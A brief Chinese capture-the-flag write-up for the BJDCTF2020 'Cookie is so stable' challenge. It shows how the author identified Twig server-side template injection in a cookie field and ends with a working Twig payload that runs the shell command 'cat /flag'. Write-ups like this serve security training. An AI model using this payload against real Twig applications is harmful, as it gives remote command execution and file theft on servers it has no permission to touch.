[BJDCTF2020]Cookie is so stable
像这种输什么回显什么的可以猜测是ssti注入
注入模板
在区分Jinja2和Twig那里是这样的:
Twig
{{7*'7'}} #输出49
Jinja
{{7*'7'}} #输出7777777
开始判断:
{7*7}
{{7*'7'}}
所以注入模板是twig
hint里面有提示
抓包,user是注入点
(抓包经过非常坎坷,开始是在输入页面抓包,抓出来的包没有回显,后来是在回显的页面抓到的包测试才有正常的回显)
直接用网上搜到的twig注入模板
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}